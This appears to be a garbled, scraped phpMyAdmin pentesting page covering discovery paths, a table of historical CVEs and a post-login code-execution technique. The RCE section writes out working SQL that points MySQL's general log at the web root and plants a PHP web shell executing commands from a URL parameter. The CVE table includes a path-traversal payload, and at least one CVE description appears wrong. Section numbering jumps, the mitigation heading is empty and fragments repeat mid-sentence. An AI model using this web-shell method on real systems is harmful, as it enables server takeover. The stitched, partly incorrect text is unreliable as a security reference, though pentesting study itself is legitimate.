Phpmyadmin Hacktricks

phpMyAdmin Pentesting Guide

Step 1: Discovery

An attacker scans for common paths:

• /phpmyadmin/
• /pma/
• /mysql/
• /db/
• /admin/mysql/
• /phpMyAdmin-4.8.0/ (version-specific paths)

11. Mitigation & Detection for Defenders

4. Authentication Bypass (Historical CVEs)

| CVE | Impact | Fixed in | |-----|--------|----------| | CVE-2016-5734 | Brute force using $cfg['AllowArbitraryServer'] | 4.6.3 | | CVE-2018-12613 | File inclusion via target=db_sql.php?/../../ | 4.8.1 | | CVE-2019-12922 | CSRF + RCE | 4.9.0.1 | phpmyadmin hacktricks

Check $cfg['AllowArbitraryServer'] = true; in config.inc.php – allows attacker to connect to external MySQL servers. phpMyAdmin Pentesting Guide Step 1: Discovery An attacker

Part 3: Remote Code Execution (RCE) After Login

Once inside, the game is over if you achieve RCE. SET GLOBAL general_log_file = '/var/www/html/shell.php'

3.2 General Log File Injection (No INTO OUTFILE needed)

If secure_file_priv blocks you, use general log:

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT "<?php system($_GET['cmd']); ?>"
-- Now every query is logged to shell.php. Trigger it.

Note: Requires file write permissions and MySQL’s ability to write to web root.